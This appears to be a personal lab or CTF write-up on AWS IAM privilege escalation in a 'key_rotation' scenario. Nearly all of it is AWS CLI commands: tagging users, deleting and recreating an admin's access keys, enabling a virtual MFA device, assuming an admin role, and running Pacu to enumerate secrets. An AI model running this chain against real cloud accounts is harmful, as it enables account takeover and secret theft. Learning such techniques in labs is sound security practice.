rootđź’€senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
IAM privesc by key_rotation
- Check policies-:
- If a user can add tags to a user, you can add administrative acccess to a user.e.g
aws iam tag-user --user-name <username> --tags '{"Key": "developer", "Value": "true"}' --profile key_rotation | jq
- Deleting access keys requires
listing the access key idlike this-:
aws iam list-access-keys --user-name <username> --profile key_rotation | jq
- Finally deleting it-:
aws iam delete-access-key --user-name admin_ --access-key-id AKIA4TCVBDXKSZGBT75K --profile key_rotation | jq
- Creating a new access-key-:
aws iam create-access-key --user-name <admin> --profile key_rotation | jq
- We need a
MFA-virtual-devicefor useradmin_*to assume rolesecretsmanager.
- Creating an MFA virtual device-:
aws iam create-virtual-mfa-device --virtual-mfa-device-name mfaDevice --outfile /home/sensei/cloud/iam_key_rotation/iam.png --bootstrap-method QRCodePNG | jq
- Showing already created mfa device-:
aws iam list-virtual-mfa-devices --profile admin_key_rotation | jq
- Scan the already created png file with an authenticator app e.g
AuthyorGoogle Authenticator.Then, the first code is the first code you see and the second code is the code generated after the first.
aws iam enable-mfa-device \
--user-name TargetIAMUserName \
--serial-number arn:aws:iam::123456789012:mfa/MyUserMFADevice \
--authentication-code-1 <first one> \
--authentication-code-2 <second code>
- Assuming role with an MFA device-:
aws sts assume-role \
--role-arm "arn:aws:iam::123456789012:role/YourAdminRoleName" \
--role-session-name "MFA-Admin-Session" \
--serial-number "arn:aws:iam::123456789012:mfa/your-username" \
--token-code <from authenticator>
- Switching to Pacu-:
#configure the temp_keys with
set_keys
#run module
run enum__secrets --region us-east-1
- Secretss-: